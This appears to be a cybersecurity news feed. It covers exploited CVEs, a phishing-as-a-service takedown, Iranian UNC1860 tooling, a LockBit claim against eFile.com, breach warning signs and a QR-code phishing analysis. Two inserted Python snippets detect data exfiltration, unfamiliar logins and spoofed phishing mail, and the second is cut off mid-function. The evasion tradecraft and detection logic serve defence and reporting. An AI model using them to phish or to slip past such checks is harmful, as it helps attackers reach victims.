Cyber security aggregate rss news

Cyber security aggregator - feeds history

Cyber News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five new vulnerabilities to its Known Exploited Vulnerabilities Catalog, highlighting the continued threat that these security gaps pose to organizations worldwide. These vulnerabilities have been flagged due to active exploitation, making them critical targets for cybercriminals seeking to infiltrate and damage federal and private-sector systems alike.

The vulnerabilities are identified as CVE-2024-27348 (Apache HugeGraph-Server Improper Access Control Vulnerability), CVE-2020-0618 (Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability), CVE-2019-1069 (Microsoft Windows Task Scheduler Privilege Escalation Vulnerability), CVE-2022-21445 (Oracle JDeveloper Remote Code Execution Vulnerability), and CVE-2020-14644 (Oracle WebLogic Server Remote Code Execution Vulnerability). All five present significant risks and are actively being targeted by malicious actors, according to CISA’s evidence of exploitation.

CISA's Known Exploited Vulnerabilities Catalog, which is updated regularly, highlights Common Vulnerabilities and Exposures (CVEs) that pose an immediate risk to organizations and their IT infrastructure. Each newly identified vulnerability, if left unaddressed, could lead to severe consequences such as unauthorized access, privilege escalation, and even remote code execution, potentially crippling networks, leaking sensitive information, or causing widespread operational disruptions.

Breaking Down New Vulnerabilities

1. CVE-2024-27348: Apache HugeGraph-Server Improper Access Control Vulnerability

Apache HugeGraph-Server, a graph database management system, suffers from an improper access control vulnerability that could allow remote attackers to execute arbitrary code on an affected server. The flaw stems from insufficient restrictions on access control mechanisms, opening a path for attackers to exploit the system remotely.

Action Required: Organizations using Apache HugeGraph-Server should immediately apply the vendor-provided mitigations to patch this vulnerability. If no patch is available, discontinuing the use of this product is advised to avoid potential compromise.

2. CVE-2020-0618: Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability

This vulnerability affects Microsoft SQL Server Reporting Services, where a deserialization flaw allows an authenticated attacker to execute arbitrary code on the server. By improperly handling page requests, the service becomes vulnerable to remote code execution, placing the server’s data and functionality at risk.

Action Required: Microsoft has issued guidance on how to mitigate this vulnerability. Organizations must promptly apply these mitigations to secure their systems. If mitigation isn't feasible, discontinuing use is the recommended course of action to protect the network from exploitation.

3. CVE-2019-1069: Microsoft Windows Task Scheduler Privilege Escalation Vulnerability

Microsoft Windows Task Scheduler, a core system utility, contains a flaw in the SetJobFileSecurityByName() function, which could enable a local, authenticated attacker to gain elevated SYSTEM privileges. This elevation could provide the attacker with full control over the affected system, allowing for far-reaching malicious activities.

Action Required: Organizations should implement Microsoft’s recommended patches or security updates. Failure to address this issue could leave the system open to severe privilege escalation, allowing attackers to execute commands with SYSTEM-level privileges.

4. CVE-2022-21445: Oracle JDeveloper Remote Code Execution Vulnerability

A remote code execution vulnerability has been identified in Oracle JDeveloper, a popular development tool within Oracle's Fusion Middleware suite. The vulnerability lies within the ADF Faces component, which suffers from deserialization flaws. These weaknesses can be exploited remotely, potentially allowing attackers to execute malicious code without the need for authentication.

Action Required: Oracle users should follow the recommended steps provided in Oracle’s advisory to mitigate this vulnerability. If mitigations are unavailable or ineffective, organizations should consider discontinuing the use of Oracle JDeveloper to prevent remote exploitation.

5. CVE-2020-14644: Oracle WebLogic Server Remote Code Execution Vulnerability

Another critical vulnerability identified in Oracle’s Fusion Middleware suite affects the WebLogic Server. This remote code execution vulnerability allows attackers to exploit deserialization weaknesses, enabling unauthenticated remote access via the T3 or IIOP protocols. This can lead to the compromise of the entire server.

Action Required: Oracle has issued a patch for this vulnerability. Immediate application of this patch is essential for ensuring system security. As with the other vulnerabilities, if no patch or workaround is available, discontinuing the use of the product is strongly recommended to avoid an attack.

A Call to Action for Federal Agencies and Beyond

The addition of these vulnerabilities to the Known Exploited Vulnerabilities Catalog comes under CISA’s Binding Operational Directive (BOD) 22-01, which mandates that Federal Civilian Executive Branch (FCEB) agencies address and remediate these vulnerabilities by a set due date. This is part of an ongoing effort to protect federal networks from active cyber threats.

Although BOD 22-01 specifically applies to FCEB agencies, CISA urges all organizations—both public and private—to adopt the same level of diligence. With the increasing sophistication of cyberattacks, organizations cannot afford to leave these vulnerabilities unpatched. Implementing timely remediation and incorporating vulnerability management practices are vital steps to protecting networks from exploitation.

Understanding the Broader Impact of These Vulnerabilities

Vulnerabilities like the ones listed above are often the most popular entry points for cybercriminals. Whether it’s through improper access controls, privilege escalation, or remote code execution, these security flaws present significant risks to any organization handling sensitive data or operating complex systems. If exploited, such vulnerabilities can result in:

- Data breaches: Leading to the exposure of sensitive or personal information.
- Operational disruptions: As attackers could seize control of servers, halt services, or demand ransoms.
- Reputational damage: Companies that fall victim to cyberattacks often suffer long-term damage to their reputation and customer trust.
- Legal and financial consequences: Non-compliance with security standards, such as failing to address known vulnerabilities, could result in heavy fines and legal action.

The continued addition of vulnerabilities to CISA’s Known Exploited Vulnerabilities Catalog is a reminder of the importance of proactive cybersecurity measures. Organizations must prioritize remediation and keep their systems updated to prevent these threats from wreaking havoc on their networks.

Cyber News

In an unprecedented move, Europol and Ameripol worked together to dismantle a phishing-as-a-service network affecting over 480,000 victims worldwide. The operation, dubbed "Operation Kaerb," targeted a criminal group that specialized in unlocking stolen mobile phones through phishing attacks. Investigators confirmed that over 1.2 million devices had been unlocked, with criminals primarily operating in Spain and Latin America.

From September 10 to 17, law enforcement in Spain, Argentina, Chile, Colombia, Ecuador, and Peru executed a series of raids, resulting in 17 arrests and the seizure of 921 items, including mobile phones, vehicles, and even weapons. The man at the center of this operation, an Argentinian national, ran a phishing platform that had been active since 2018. He built a business on selling access to the platform to "unlockers"—criminals who provide phone unlocking services to those in possession of stolen mobile phones.

Phishing-as-a-Service Model

This wasn't just any phishing scheme. The platform operated as a phishing-as-a-service (PhaaS) model, offering easy access to low-skilled cybercriminals. "Unlockers" paid for access and additional features like phishing SMS and email templates.

Phishing attacks generally involve tricking victims into giving up sensitive information by pretending to be a legitimate service. In this case, attackers targeted mobile phone owners who had activated "Lost Mode" on their devices. Victims, often from European and Latin American countries, received phishing messages urging them to provide credentials to regain access to their phones. The attack exploited the emotional vulnerability of the victims, making it easier for criminals to steal sensitive data. Once the credentials were in hand, criminals would unlock the phones, essentially wiping any connection to the legitimate owner.

Europol and Ameripol's Role

The international success of this operation can be credited to the cooperation between Europol’s European Cybercrime Centre (EC3) and Ameripol’s Specialized Cybercrime Centre. This marks the first joint operation between the two agencies, and it highlights the growing need for cross-border cybersecurity initiatives.

Europol had been investigating the phishing network since 2022 after receiving intelligence from Group-IB, a cybersecurity firm. The organization worked closely with the affected countries, providing them with vital information and coordinating the operation from start to finish. During the week of the raids, Europol deployed experts to both Argentina and Spain, ensuring local authorities had the necessary support to take down the network. In coordination with Ameripol, law enforcement dismantled the infrastructure, seized the iServer domain used to host the phishing attacks, and apprehended the network's key players.

How the Phishing Network Worked

The phishing platform, called iServer, had been operational for over five years, primarily serving Spanish-speaking countries but expanding into Europe as well. What set iServer apart was its automation. Criminals didn't need advanced hacking skills to operate the platform. The web-based interface made it simple for users to create phishing pages and send malicious links via SMS.

After the victim clicked the link, a "redirector" filtered out users who didn’t meet certain criteria. Those who passed were sent to a final phishing page disguised as a legitimate mobile service site. The platform collected login credentials, which the criminals then used to unlock the stolen phones. Unlockers were able to gather details like IMEI numbers, owner information, and even OTP (one-time passwords) to bypass security features like Lost Mode. Once unlocked, the phones could be resold without any trace of the original owner, effectively making it impossible for victims to recover their devices.

Crimeware-as-a-Service: The New Threat Model

The iServer platform is part of a larger trend known as "crimeware-as-a-service." These platforms lower the barrier to entry for cybercriminals by providing all the tools they need to commit digital crimes. PhaaS platforms like iServer make it easier for criminals with little technical skill to execute sophisticated phishing attacks. This is particularly concerning in regions like Latin America, where cybercrime is on the rise.

By selling access to these platforms, individuals can profit without having to understand the technical side of phishing or hacking. It’s a growing concern for cybersecurity professionals as these platforms democratize access to high-impact cybercrime.

Operation Kaerb has struck a significant blow to cybercriminals exploiting phishing-as-a-service models. Yet, as the cybersecurity landscape continues to evolve, new threats will emerge. The dismantling of the iServer platform represents a victory, but it’s just a step in a much larger fight. The global cybercrime ecosystem continues to grow, and with it, the need for ongoing vigilance from both the public and private sectors.

Threat Intelligence News

UNC1860, an Iranian state-sponsored threat actor, has emerged as a formidable cyber force in the Middle East. Likely tied to Iran’s Ministry of Intelligence and Security (MOIS), the UNC1860 group is known for its specialized tooling and passive backdoors, which enable long-term access to critical networks, including the government and telecommunications sectors. Operating as an initial access provider, UNC1860 has displayed its ability to infiltrate high-priority networks across the region, aiding in espionage and cyberattacks.

UNC1860’s Role in Iran's Cyber Campaigns

Mandiant identifies UNC1860 as a key player in Iran’s cyber ecosystem, paralleling other Iranian groups such as Shrouded Snooper, Scarred Manticore, and Storm-0861. These actors have targeted Middle Eastern telecommunications and government networks, potentially collaborating on major disruptive operations, including the BABYWIPER attacks on Israel in 2023 and the ROADSWEEP campaign against Albania in 2022.

Although direct involvement in these attacks by UNC1860 remains unverified, the group’s sophisticated malware controllers—TEMPLEPLAY and VIROGREEN—suggest its role as an initial access provider. These tools enable seamless hand-off operations, giving third-party actors remote access to victim networks and underlining UNC1860’s significance in Iran’s offensive cyber strategy.

Tools of the Trade: UNC1860’s Specialized Arsenal

UNC1860’s toolkit includes GUI-operated malware controllers and passive implants designed for stealth and persistence. One standout feature is a Windows kernel-mode driver repurposed from an Iranian antivirus software filter. This reflects the group’s reverse engineering expertise and ability to evade detection.

By exploiting vulnerabilities in internet-facing servers, UNC1860 establishes initial footholds in target networks, deploying utilities and implants to evade detection. Their arsenal includes passive implants like OATBOAT and TOFUDRV, which avoid traditional command-and-control infrastructure, making detection by security teams difficult. These implants leverage HTTPS encryption and use undocumented Input/Output Control commands, ensuring secure and covert communications.

UNC1860 and APT34: A Cooperative Threat

Mandiant’s investigations suggest a close overlap between UNC1860 and APT34, another MOIS-linked threat actor. APT34, also known as Cobalt Gypsy, Hazel Sandstorm, Helix Kitten, and other aliases, is known to carry out supply chain attacks, using social engineering and recently patched vulnerabilities, explained researchers at Cyble Research and Intelligence Labs. APT34 relies on custom DNS tunneling protocols for command and control and data exfiltration, along with web shells and backdoors for persistent access to servers. Cutting Kitten employs stolen account credentials for lateral movement and uses phishing sites to harvest credentials for accessing targeted organizations, Cyble added.

Both groups have been observed operating within the same victim environments, possibly sharing tools and access, Mandiant said. In multiple engagements between 2019 and 2020, organizations compromised by APT34 were later found to have been infiltrated by UNC1860, suggesting a coordinated approach to cyber espionage and lateral movement across networks. This collaboration is further evidenced by both groups' pivot to Iraq-based targets, highlighting their flexible and opportunistic nature. UNC1860’s use of web shells and droppers, including STAYSHANTE and SASHEYAWAY, allows for the smooth execution of their more advanced malware, which can be handed off to third-party actors for further exploitation.

[Figure: Illustration of a collaborating actor's command and control (C2 or C&C) using existing UNC1860 implant infrastructure in a compromised network. Source: Google-owned Mandiant]

TEMPLEPLAY and VIROGREEN: UNC1860’s Custom Controllers

UNC1860’s malware controllers TEMPLEPLAY and VIROGREEN offer advanced post-exploitation capabilities. TEMPLEPLAY, a .NET-based controller for the TEMPLEDOOR backdoor, allows operators to execute commands, upload and download files, and establish HTTP proxies to bypass network boundaries. Its user-friendly GUI provides third-party operators with easy access to infected machines, facilitating remote desktop connections and internal network scanning.

VIROGREEN, meanwhile, is designed to exploit vulnerable SharePoint servers using CVE-2019-0604. It includes functions for deploying backdoors like STAYSHANTE and BASEWALK, scanning for vulnerabilities, and controlling compromised systems. Together, these controllers represent a significant part of UNC1860’s toolkit, enabling the group to maintain persistent access and facilitate further attacks.

Passive Backdoors: UNC1860’s Stealthy Persistence

One of UNC1860’s key strengths lies in its passive implants, which offer stealth and persistence in victim environments. These implants, including TOFUDRV and TEMPLEDROP, provide advanced evasion techniques by leveraging the Windows kernel. By avoiding outbound traffic and initiating communications from volatile sources, these implants make network monitoring exceedingly difficult. Their ability to function without traditional command-and-control infrastructure further complicates detection efforts.

UNC1860’s malware development includes custom Base64 encoding/decoding and XOR encryption/decryption methods. These custom libraries allow the group to bypass standard detection mechanisms and ensure compatibility across different .NET versions. By implementing these functions independently, UNC1860 demonstrates its deep understanding of Windows internals and its commitment to avoiding detection.

Long-Term Persistence: UNC1860’s Main-Stage Backdoors

UNC1860’s foothold utilities and backdoors are designed for long-term persistence, using obfuscation methods to evade detection. Their “main-stage” implants, including TEMPLEDOOR, further extend their operational security by providing robust footholds in victim environments. These backdoors are often reserved for high-priority targets, particularly in the telecommunications sector, and demonstrate UNC1860’s advanced capabilities in reverse engineering and defense evasion.

Conclusion: UNC1860’s Growing Influence

As cyber tensions rise in the Middle East, UNC1860’s role as an initial access provider and persistent threat actor continues to grow. Their sophisticated tooling and ability to gain and maintain access to high-value networks make them a significant player in Iran’s cyber operations. With deep expertise in reverse engineering and stealth, UNC1860 is likely to remain a critical asset in Iran’s cyber arsenal, capable of adapting to evolving objectives and shifting geopolitical landscapes.

UNC1860’s continued operations signal the growing complexity of state-sponsored cyber threats, particularly in the Middle East. Network defenders in the region must remain vigilant, as UNC1860’s advanced tradecraft and evasive techniques present a persistent challenge to cybersecurity efforts.

Cyber News

Sensitive tax information of U.S. citizens could potentially be exposed after the notorious LockBit ransomware group claimed responsibility for a ransomware attack on eFile.com, a well-known Internal Revenue Service (IRS) authorized online tax-filing service. This claim, following a malware incident earlier in 2023, raises concerns about the cybersecurity measures in place at critical financial service providers.

Background of the eFile Attack

LockBit claimed eFile.com as one of its victims in a dark web post on September 18, 2024. Researchers at Cyble, an AI-powered threat intelligence platform, told The Cyber Express that LockBit did not post any documents, a step ransomware groups commonly take as proof of compromise.

[Figure: Source: X]

Currently, details regarding the extent of the LockBit ransomware attack, the data compromised, and the motive behind the cyber assault remain undisclosed, but the group has set a deadline of 14 days to leak the compromised data. Despite the claims made by LockBit, the company's official website remains fully functional. This discrepancy has raised doubts about the authenticity of the threat actor’s assertion. To ascertain the veracity of the claims, The Cyber Express has reached out to eFile officials. At the time of writing, no response had been received, leaving the ransomware attack claim unverified.

Understanding the eFile Attack in 2023

According to Dr. Johannes Ullrich, Dean of Research at the SANS Technology Institute, the efile.com site was found to be serving malicious JavaScript that redirected users to download malware. Named "efail" by researchers, this malware exploited a vulnerability within the tax-filing platform, potentially allowing criminals to access a treasure trove of sensitive data including social security numbers, home addresses, income information, and other personal details.

[Figure: The bug unintentionally downloaded by users in 2023. Source: SANS Internet Storm Center]

In that case, the malware operated by rerouting users to a corrupted third-party site where the malicious code was downloaded. The breach highlighted a significant vulnerability in the supply chain, as users visiting the official eFile.com site were being victimized without engaging in any unsafe browsing behavior. After Ullrich’s report, eFile removed the malware days later and reassured users that the site was safe. LockBit’s new claim may suggest ongoing security flaws or insufficient patching.

LockBit Ransomware Allegedly Targeted eFile Back in 2022

This is not the first instance in which eFile has been claimed as a ransomware victim. LockBit had claimed to have compromised eFile.com on January 19, 2022. The ransomware group has now asserted that it has compromised the site again, which could have far more devastating consequences. The crucial aspect of this attack is the timing, which comes just before the October filing deadline for U.S. taxpayers who requested extensions. This is an indication that cybercriminals are intentionally targeting moments of peak traffic to maximize the impact of their breaches.

LockBit’s Growing List of Targets

LockBit has been relentless in its attacks on major institutions. The ransomware gang, even amid global law enforcement crackdowns, remains one of the most prolific cybercriminal groups in operation. The group accounts for about 8% of ransomware infections worldwide. The claimed breach at eFile.com fits within LockBit’s modus operandi, which focuses on high-value targets that house a wealth of sensitive data. The financial and government sectors have long been prime targets for ransomware gangs, largely because the data they hold is highly sensitive, and the consequences of a breach can be far-reaching, impacting millions of people.

Consequences for eFile.com Users

For the millions of users who rely on eFile.com to file their taxes, the potential consequences are dire. If LockBit's claim proves true, taxpayers' personal and financial data may be in the hands of criminals. This data could be used for a variety of nefarious activities, including identity theft, tax fraud, and account takeovers.

The claimed breach at eFile.com is a stark reminder of the need for robust cybersecurity measures, particularly for companies that deal with large amounts of personal information. Stronger oversight of third-party vendors, improved endpoint security, and constant vigilance through security audits are all necessary to protect against evolving threats. As LockBit continues its reign of ransomware attacks, companies must rethink their cybersecurity protocols.

Firewall Daily

Data breaches have emerged as one of the most dreaded threats for organizations of all sizes. As businesses increasingly store and process vast amounts of sensitive data electronically, the importance of safeguarding this information has never been greater. Yet, many companies overlook critical warning signs, leaving   show more ...

themselves vulnerable to cyber-attacks that can lead to devastating breaches—resulting in financial loss, reputational damage, and legal repercussions. In a world where cyber threats are constantly evolving, no business is immune. The difference between preventing a breach and falling victim to one often lies in early detection and swift, proactive action. This article highlights ten key warning signs that your business may be on the brink of a data leak and offers practical steps to minimize these risks before serious harm is done. Steps to Minimize Data Breach Risks 1. Outdated Software or Systems One of the most glaring red flags for data breaches is running outdated software or systems. Many organizations fail to update their operating systems, applications, and security patches in a timely manner, leaving them vulnerable to exploitation. Older systems often contain well-known security flaws that hackers can easily target. Updates and patches are released precisely because cybersecurity experts identify critical vulnerabilities. Ignoring these updates places companies at risk of falling prey to known attack methods. Even if your organization uses firewalls or antivirus software, outdated systems can still serve as a weak link, providing attackers with an entry point. Additionally, legacy systems may not be compatible with modern security tools, further amplifying the risk. Businesses that delay updating their systems are prime targets for ransomware attacks, data theft, or even full-scale network compromises. Implementing automated patching as part of a structured approach to software updates is crucial for mitigating these risks and maintaining a strong security posture. 2. Weak or Reused Passwords Weak or reused passwords are a significant threat to your company's data security. Hackers can easily exploit such vulnerabilities through brute-force attacks or credential stuffing, where they use password lists from previous breaches to gain unauthorized access. 
Reusing passwords across multiple platforms magnifies the risk—once one account is compromised, the same credentials can be used to infiltrate other systems, including corporate networks, cloud services, and financial accounts. Moreover, weak passwords are often predictable, making them easier for hackers to guess or crack. To mitigate this, it's crucial to implement long, complex, and unique passwords for each system. Strong password policies, coupled with two-factor authentication (2FA), are essential in preventing unauthorized access. Allowing weak or reused passwords exposes the entire network to potential breaches, turning compromised credentials into a doorway for cybercriminals and setting the stage for a data breach disaster. 3. Insufficient Employee Security Awareness Human error is often the weakest link in cybersecurity, and a lack of employee security awareness training is a significant indicator that your company may be vulnerable to data breaches. Cyber attackers frequently exploit this vulnerability through phishing, social engineering, and credential theft. Employees who are not trained to recognize phishing attempts or understand the importance of strong passwords may inadvertently expose sensitive data. Security awareness training equips employees with the knowledge to identify potential threats, report suspicious activity, and adhere to best practices, such as enabling two-factor authentication. It is crucial that employees are educated on proper data handling procedures and the necessary steps to take in the event of a security incident. Without regular and updated training on emerging threats, your organization remains at high risk of data breaches. An informed and vigilant staff is a cornerstone of a robust cybersecurity strategy. 4. Absence of an Incident Response Plan A very clear red flag indicating that a company has not prepared for a possible data breach is the absence of a written IRP. 
An IRP spells out the procedures needed to identify a security incident, contain the damage, mitigate the situation and recover from it. Without structured planning, breach detection and response in most organizations are delayed, leading to prolonged exposure, greater damage and higher recovery costs. In the absence of an IRP, employees are also unsure how to communicate and which containment steps to take. A proper IRP defines roles and responsibilities, sets out how stakeholders are to be informed, and includes post-incident analysis so that similar incidents are avoided in future. The plan should be tested and updated routinely to make sure it actually works. Organizations without an IRP take considerably longer to respond to a breach, giving the attacker extra hours inside their systems and causing far graver data loss.

5. Inconsistent or Non-existent Data Backup Practices

Inconsistent or non-existent backups are a major indicator of exposure to data breaches and ransomware. Organizations without regular backups risk losing critical data in a breach, a hardware failure or another cyber incident. Ransomware in particular encrypts an organization's files, rendering them unusable until the ransom is paid, and companies without robust backups may find themselves compelled to pay. Regular, encrypted backups are a safeguard against such attacks, allowing an organization to recover without giving in to the demand, with one caveat: ransomware operators look for reachable backups and encrypt or delete them first, so at least one copy must be offline or immutable (not writable with the credentials the production network uses), and restores must be tested regularly, because an untested backup is only a hope. Backups should be stored securely offsite and in the cloud so they remain accessible in a network-wide breach or disaster. Without a sound backup strategy, even a minor breach can lead to catastrophic data loss.

6. Outdated or Non-existent Firewall Protection

A firewall is the barrier between your internal network and external threats, and an outdated or missing one is a significant red flag. Outdated firewalls offer little protection against current attacks such as zero-day exploits and DDoS traffic, and a misconfigured firewall can leave unnecessary ports or services open, giving attackers an easy way in. Proper firewall management secures the network perimeter and filters out malicious traffic; an up-to-date, correctly configured firewall is vital to keeping sensitive parts of the network out of reach of unauthorized access. Organizations with inadequate firewall protection are significantly more susceptible to intrusions and data breaches.

7. Lack of Network Monitoring

The absence of real-time network monitoring is a critical warning sign. Many attacks go undetected for weeks or months, during which the attacker steals sensitive information or deploys malware. Without monitoring, a company may remain unaware of unauthorized access, data exfiltration or other malicious activity until it is too late. Monitoring tools can detect unusual behavior such as large data transfers, access from unfamiliar IP addresses and attempts to get past the firewall; proactive monitoring also helps identify insider threats, whether intentional or inadvertent. Without it, an attacker's lateral movement goes unnoticed, increasing the risk of sensitive data theft.

8. Uncontrolled Access to Sensitive Data

Uncontrolled or poorly managed access to sensitive data is another major risk factor. When employees have access to data or systems beyond what their role requires, accidental and malicious breaches both become more likely. A sales representative, for instance, should not have access to human resources or financial records. Adopting the Principle of Least Privilege (PoLP) and granting only the access each role needs reduces breach risk significantly. Failing to review and update access controls regularly lets former employees and contractors retain access to critical systems. Role-based access control (RBAC) combined with regular access audits ensures that only authorized personnel can reach sensitive information, minimizing the risk of insider threats and breaches.

9. Lack of Data Encryption

Missing encryption of data in transit and at rest is a significant vulnerability. Encryption ensures that even if an attacker intercepts traffic or copies files, the contents cannot be read without the decryption keys. Many organizations encrypt data in transit (TLS) but neglect data at rest, leaving customer records, financial information and proprietary data exposed wherever a disk, database or backup is copied. Endpoints such as laptops, smartphones and portable drives are especially prone to theft or loss; without full-disk encryption each of them is a potential breach. Organizations must encrypt data both in transit and at rest, and keep the keys separate from the data they protect, so that a lost device or a leaked storage volume does not become an exposure of sensitive information.

10. Failure to Adhere to Data Protection Regulations

Non-compliance with data protection regulations such as GDPR or HIPAA is a major indicator of breach risk. These regulations set requirements for handling, storing and protecting sensitive information; failing to meet them not only increases the likelihood of a breach but also brings significant legal and financial consequences. Weak internal policies, inadequate data protection strategies and insufficient investment in security infrastructure are common causes of non-compliance. Regular audits and policy reviews are essential to maintain both compliance and robust protection. Non-compliance exposes an organization to cyber threats and severe legal repercussions alike, damaging reputation and financial stability.

By addressing these areas, businesses can fortify their defenses and reduce the risk of a devastating data breach. In a rapidly evolving threat landscape, decisive action now can prevent catastrophic consequences and secure the long-term security and resilience of the organization.
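The two checks named under 7 (large outbound transfers, sign-ins from addresses never seen before) reduce to a few lines over flow and authentication records. The following is an added example, not code from the original article; the records, address ranges and the egress threshold are constructed for illustration, and in a real deployment the inputs would come from a flow collector and the identity provider's sign-in log.

```python
import ipaddress
from collections import defaultdict

# Constructed sample data (not real telemetry).
# Flow records: (source host, destination IP, bytes sent).
SAMPLE_FLOWS = [
    ("ws-finance-07", "10.0.4.12", 400_000_000),     # internal file share, ignored
    ("ws-finance-07", "203.0.113.45", 350_000_000),  # external upload
    ("ws-finance-07", "203.0.113.45", 300_000_000),  # same destination, later in the window
    ("ws-sales-02", "198.51.100.8", 20_000_000),     # small external transfer
]
# Authentication records: (user, source IP, outcome).
SAMPLE_AUTHS = [
    ("alice", "10.0.4.12", "success"),
    ("bob", "198.51.100.23", "success"),   # VPN egress range, known
    ("carol", "203.0.113.9", "failure"),   # address never seen before
]

# Assumed address plan: RFC 1918 space is "inside", one public /24 is the VPN egress.
CORPORATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
KNOWN_LOGIN_NETS = CORPORATE_NETS + [ipaddress.ip_network("198.51.100.0/24")]
EGRESS_THRESHOLD = 500_000_000  # bytes per host per window; tune per environment


def in_any(ip, nets):
    """True if ip falls inside any of the given networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def find_large_egress(flows, corporate_nets=CORPORATE_NETS, threshold=EGRESS_THRESHOLD):
    """Sum bytes each host sends to non-corporate destinations; return hosts over threshold."""
    egress = defaultdict(int)
    for host, dst_ip, nbytes in flows:
        if not in_any(dst_ip, corporate_nets):
            egress[host] += nbytes
    return {host: total for host, total in egress.items() if total > threshold}


def find_unfamiliar_logins(auths, known_nets=KNOWN_LOGIN_NETS):
    """Return authentication attempts whose source IP is outside every known network.

    Failures are reported too: a failed login from an unknown address is the
    start of a credential-stuffing run, not noise.
    """
    return [(user, ip, outcome) for user, ip, outcome in auths if not in_any(ip, known_nets)]


if __name__ == "__main__":
    for host, total in find_large_egress(SAMPLE_FLOWS).items():
        print(f"ALERT large egress: {host} sent {total / 1e6:.0f} MB to external hosts")
    for user, ip, outcome in find_unfamiliar_logins(SAMPLE_AUTHS):
        print(f"ALERT unfamiliar login source: {user} from {ip} ({outcome})")
```

The egress check deliberately ignores internal destinations, so a legitimate 400 MB copy to a file share does not trip it, while two moderate uploads to the same external address within one window do. The sign-in check keys on network, not on exact address, so a VPN pool with rotating egress IPs does not generate a new alert every session.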


 Business

The trend of using spearphishing techniques in mass emails continues to gain momentum. We recently came across a sample email in which attackers used a whole box of relatively sophisticated spearphishing tricks. Now, one might think that use of such tactics for a mere mass phishing attack would be somewhat OTT in terms of effort on the attackers' side; not so, it transpired in this case: the attackers still gave it a shot (though detailed analysis reveals the attack was doomed from the start). In any case, it presented us with an excellent opportunity to take a dive into the techniques employed by phishers.

Email mimicking an update of corporate guidelines

Almost everything about the email is spot on. It's addressed to a specific individual within a specific organization, and uses ghost spoofing for the sender's name, that is, the display name in the From field is a forgery of a legitimate address at the target company (which, of course, has no relation to the actual sending address, nor to the address in the Reply-To field). The email is sent through the infrastructure of a reputable marketing company, raising no red flags with email filters. What's more, the name of this company and the top-level domain hosting its website are deliberately chosen to lull the recipient's vigilance: the website is based in Indonesia, and the victim may well perceive the .id domain as an abbreviation for "identifier" rather than a country code. Alongside the spoofed address in the From field, it looks convincing enough.

Email mimicking update of corporate guidelines.

But that's not all. The email body contains practically zero text, only a copyright line and an unsubscribe link (both of which, as it happens, are inserted by the mail engine of the legitimate company used to send the message). Everything else, including the recipient's name, is an image. This is to prevent anti-phishing mechanisms from applying text-based filtering rules. An attached PDF file is used instead of a direct phishing link for the same reason: websites can easily be blacklisted and blocked at the mail-server level, whereas a PDF file appears as a completely legitimate attachment.

PDF attachment

In actual fact, attackers have long been concealing links in PDF files.
Thus, in theory, security software should be able to analyze a PDF, including any text and links within. But the creators of this phishing campaign were wise to that as well: their PDF technically has no text or links in it whatsoever. Instead, it presents another image featuring a QR code, with the accompanying text embedded in the image.

Contents of the attached PDF file: the QR code contains a malicious link.

In addition, the PDF mimics the interface of DocuSign, a well-known electronic document management service. DocuSign does indeed allow you to send documents for signing and to track their status, but, of course, it has nothing to do with PDF files housing a QR code. At this point it becomes painfully obvious that the attackers overcooked the attack. The victim receives what seem to be confidential corporate guidelines by email, but to read them they need to scan a QR code with a mobile phone, which is not exactly realistic. Most employees won't bother, especially if they use their own (non-corporate) phone.

Epic fail: the phishing website

So what happens if the victim does pull out their phone and scan the code? Well, for starters, they'll be greeted by Cloudflare's verification system and asked to prove they're human. Cloudflare is a legitimate service that guards against DDoS attacks, and cybercriminals like to put their phishing pages behind it to add plausibility. But after that it's a disaster. The website plays an animation of an envelope opening, then crashes with an error message.

Phishing site that appears to have an overdue bill.

It appears the attackers forgot to renew their subscription to the hosting service. Maybe the site had some more kooky tricks in store for the victim, but by the time the phishing emails were being pumped out, it was already defunct.

How to stay safe

To protect company employees from phishing:

- Secure corporate email at the mail-gateway level.
- Use local security solutions with anti-phishing technologies on all work devices (including mobile ones).
- Inform employees of the latest phishing tricks (for example, by pointing them toward our posts regarding signs of phishing).
- Hold regular cybersecurity awareness training for staff.
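The header and body traits described above (an address forged into the From display name, a Reply-To at a third domain, an image-only body, a PDF where a link would normally be) are all visible to a mail gateway before any URL is followed. The following is an added example, not code from the original post or from Kaspersky: a small analyzer over a constructed message built with Python's standard email library. The addresses, domains and attachment in the sample are invented; the 15-word threshold for "no real text" is an assumption to tune.

```python
import email
import re
from email import policy

# Constructed sample message (not the one from the original post). The From
# display name carries a forged corporate address, the real sender is a
# marketing platform, Reply-To goes elsewhere, the body is one image plus the
# platform's own footer, and a PDF is attached instead of a link.
SAMPLE_RAW = """From: "hr@example-corp.com" <campaign-4471@mail.example-marketing.id>
Reply-To: guidelines-desk@example-mail.net
To: jane.doe@example-corp.com
Subject: Updated corporate guidelines
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: multipart/related; boundary="b2"

--b2
Content-Type: text/html; charset="utf-8"

<html><body><img src="cid:body.png"><p>&copy; 2024 | <a href="https://mail.example-marketing.id/u">Unsubscribe</a></p></body></html>
--b2
Content-Type: image/png; name="body.png"
Content-ID: <body.png>
Content-Transfer-Encoding: base64

iVBORw0KGgo=
--b2--
--b1
Content-Type: application/pdf; name="guidelines.pdf"
Content-Disposition: attachment; filename="guidelines.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b1--
"""

# Constructed benign message for comparison.
BENIGN_RAW = """From: Alice <alice@example-corp.com>
To: bob@example-corp.com
Subject: lunch

Lunch tomorrow at noon? Let me know what works for you and I will book a table.
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
TAG_RE = re.compile(r"<[^>]+>")
MIN_BODY_WORDS = 15  # assumed threshold below which an image-bearing body counts as "image only"


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyze(raw):
    """Return a list of human-readable findings for one raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    sender = msg["From"].addresses[0] if msg["From"] else None
    display = sender.display_name if sender else ""
    actual = sender.addr_spec if sender else ""

    # 1. Ghost spoofing: the display name itself looks like an address at another domain.
    embedded = EMAIL_RE.search(display)
    if embedded and domain_of(embedded.group()) != domain_of(actual):
        findings.append(f"display-name address {embedded.group()} differs from sender {actual}")

    # 2. Replies are routed to a third domain.
    reply_to = msg["Reply-To"].addresses[0].addr_spec if msg["Reply-To"] else ""
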